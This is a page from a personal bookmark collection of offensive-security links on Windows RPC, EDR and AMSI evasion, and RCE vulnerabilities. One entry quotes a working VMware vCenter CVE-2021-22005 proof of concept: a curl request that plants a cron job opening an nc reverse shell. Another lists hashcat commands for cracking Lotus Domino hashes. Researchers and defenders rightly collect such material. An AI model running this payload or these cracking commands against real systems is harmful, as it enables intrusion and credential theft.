776 links
  • Shared Bookmarks
  • Home
  • Login
  • RSS Feed
  • ATOM Feed
  • Tag cloud
  • Picture wall
  • Daily
Links per page: 20 50 100
◄Older
page 19 / 39
Newer►
  • thumbnail
    wvu on Twitter: "CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below. curl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444" https://t.co/bwjMA21ifA" / Twitter
    September 28, 2021 at 2:34:36 PM UTC - permalink -
    QRCode
    - https://twitter.com/wvuuuuuuuuuuuuu/status/1442634215330390020/photo/1
    rce vcenter poc vmware
  • thumbnail
    Using DVC to tunnel arbitrary connections inside of RDP
    September 15, 2021 at 12:04:36 PM UTC - permalink -
    QRCode
    - https://www.errno.fr/RDPTunneling.html#from-linux
    rdp2tcp rdp tunneling socks proxychains
  • thumbnail
    Pricing
    September 15, 2021 at 8:32:42 AM UTC - permalink -
    QRCode
    - https://www.snaplabs.io/pricing
    snap labs custom deployment
  • thumbnail
    impacket/epm.py at cd4fe47cfcb72d7d35237a99e3df95cedf96e94f · SecureAuthCorp/impacket
    September 11, 2021 at 10:44:25 PM UTC - permalink -
    QRCode
    - https://github.com/SecureAuthCorp/impacket/blob/cd4fe47cfcb72d7d35237a99e3df95cedf96e94f/impacket/dcerpc/v5/epm.py#L696
    rpc uuid windows rpcview
  • thumbnail
    Lotus Domino: Penetration Through the Controller Alexey Sintsov - Lotus Domino- Penetration Through the Controller.pdf

    Cracking hash:

    # All passwords having any-char and length from 1 to 6
     hashcat -m 8600 --increment --increment-min=1 -a 3 hashes.txt ?a?a?a?a?a?a
    
    # All [a-z0-9] passwords having length from 7 to 8
    hashcat -m 8600 --increment --increment-min=7 -1 ?l?d -a 3 hashes.txt ?1?1?1?1?1?1?1?1
    
    # All numeric passwords having length from 9 to 10
    hashcat -m 8600 --increment --increment-min=7 -a 3 hashes.txt ?d?d?d?d?d?d?d?d?d?d
    
    # All passwords having 5 lowercase letters and 3 numbers
    hashcat -m 8600 -a 3 hashes.txt ?l?l?l?l?l?l?d?d?d
    
    # All passwords having 5 lowercase letters, 1 dot and 2 numbers
    hashcat -m 8600 -a 3 hashes.txt ?l?l?l?l?l.?d?d
    
    # All passwords having 1 any-char, 5 lowercase letters, 1 any-char and 1 number
    hashcat -m 8600 -a 3 hashes.txt ?a?l?l?l?l?l?a?d
    
    # All passwords having 1 [a-zA-Z] char, 6 lowercase letters and 2 numbers
    hashcat -m 8600 -1 ?l?u -a 3 hashes.txt ?1?l?l?l?l?l?l?d?d
    
    # All passwords contained in dictionaries
    hashcat -m 8600 -a 0 hashes.txt dictionaries/weakpass_2
    hashcat -m 8600 -a 0 hashes.txt dictionaries/HashesOrg
    
    # All passwords combining words in dictionaries and masks
    hashcat -m 8600 -1 ?l?u?d -a 6 hashes.txt dictionaries/rockyou.txt ?1?1
    hashcat -m 8600 -a 6 hashes.txt dictionaries/rockyou.txt ?d?d?d
    hashcat -m 8600 -a 6 hashes.txt dictionaries/hk_hlm_founds.txt ?a
    
    # All passwords combining masks and words in dictionaries
    hashcat -m 8600 -1 ?l?u?d -a 7 hashes.txt ?1?1 dictionaries/rockyou.txt
    hashcat -m 8600 -a 7 hashes.txt ?d?d?d dictionaries/rockyou.txt
    hashcat -m 8600 -a 7 hashes.txt ?a dictionaries/hk_hlm_founds.txt
    September 10, 2021 at 9:37:08 PM UTC - permalink -
    QRCode
    - http://index-of.es/Failed-attack-techniques/Lotus%20Domino-%20Penetration%20Through%20the%20Controller.pdf
    ibm lotus domino
  • thumbnail
    What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.
    September 10, 2021 at 9:19:13 PM UTC - permalink -
    QRCode
    - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
    rce unserialize java jboss weblogic websphere jenkins
  • thumbnail
    pinvoke.net: the interop wiki!
    September 7, 2021 at 9:10:03 PM UTC - permalink -
    QRCode
    - https://www.pinvoke.net/
    undocumented api windows internals functions interfaces
  • thumbnail
    Offensive Windows IPC Internals 1: Named Pipes · csandker.io
    September 7, 2021 at 9:09:25 PM UTC - permalink -
    QRCode
    - https://csandker.io/2021/01/10/Offensive-Windows-IPC-1-NamedPipes.html
    named pipes offensive windows ipc internals
  • thumbnail
    main.dvi - gpumalware.malware10.pdf

    PoC:
    https://github.com/nwork/jellyfish
    https://github.com/nwork/WIN_JELLY

    Autre paper
    http://old.dfrws.org/2015/proceedings/DFRWS2015-10.pdf

    September 7, 2021 at 9:08:08 PM UTC - permalink -
    QRCode
    - http://publications.ics.forth.gr/_publications/gpumalware.malware10.pdf
    malware gpu cpu gpgpu paper research
  • thumbnail
    RPCDump/rpc_resolve.h at main · csandker/RPCDump

    Correlating RPC interface UUID to their corresponding services

    September 6, 2021 at 9:38:04 PM UTC - permalink -
    QRCode
    - https://github.com/csandker/RPCDump/blob/main/CPP-RPCDump/rpc_resolve.h
    uuid rpc interface idl
  • thumbnail
    Offensive Windows IPC Internals 2: RPC · csandker.io
    September 6, 2021 at 8:06:39 PM UTC - permalink -
    QRCode
    - https://csandker.io/2021/02/21/Offensive-Windows-IPC-2-RPC.html
    windows rpc internals ipc alpclpc
  • thumbnail
    From RpcView to PetitPotam | itm4n's blog
    September 6, 2021 at 8:06:10 PM UTC - permalink -
    QRCode
    - https://itm4n.github.io/from-rpcview-to-petitpotam/
    rpc efsrpc petitpotam rpcview
  • thumbnail
    BugBountyHunting.com - A community-curated Resource for Bug Bounty Hunting
    September 6, 2021 at 1:49:39 PM UTC - permalink -
    QRCode
    - https://www.bugbountyhunting.com/
    bug bounty search engine research
  • thumbnail
    DLL Hijacking & DLL Proxying An SNES Emulator – HuskyHacks
    September 6, 2021 at 12:17:31 PM UTC - permalink -
    QRCode
    - https://huskyhacks.dev/2021/08/29/dll-hijacking-dll-proxying-an-snes-emulator/
    dll hijacking proxifying export ctypes module def
  • thumbnail
    Sequoia: A Local Privilege Escalation Vulnerability in Linux’s Filesystem Layer (CVE-2021-33909) | Qualys Security Blog
    September 6, 2021 at 10:45:39 AM UTC * - permalink -
    QRCode
    - https://blog.qualys.com/vulnerabilities-threat-research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in-linuxs-filesystem-layer-cve-2021-33909
    linux lpe
  • thumbnail
    Introducing Process Hiving & RunPE - Nettitude Labs
    September 6, 2021 at 9:44:43 AM UTC - permalink -
    QRCode
    - https://labs.nettitude.com/blog/introducing-process-hiving-runpe/
    process hiving edr evasion bypass
  • thumbnail
    Blinding EDR On Windows - Red Team Blog
    September 6, 2021 at 9:44:26 AM UTC - permalink -
    QRCode
    - https://synzack.github.io/Blinding-EDR-On-Windows/
    edr evasion bypass windows
  • thumbnail
    Defense Evasion Series Part 1 AMSI Bypass | Dazzy Ddos
    September 6, 2021 at 9:44:06 AM UTC - permalink -
    QRCode
    - https://dazzyddos.github.io/posts/AMSI-Bypass/
    evasion defense amsi bypass windows
  • thumbnail
    反制爬虫之Burp Suite RCE
    September 6, 2021 at 9:42:51 AM UTC - permalink -
    QRCode
    - http://noahblog.360.cn/burp-suite-rce/
    rce burp math.expm1 v8 javascript headless chrome
  • thumbnail
    Reimplementing Local RPC in .NET
    September 5, 2021 at 8:35:22 PM UTC - permalink -
    QRCode
    - https://www.powerofcommunity.net/poc2019/James.pdf
    rpc james forshaw idl
Links per page: 20 50 100
◄Older
page 19 / 39
Newer►
Shaarli - The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community - Help/documentation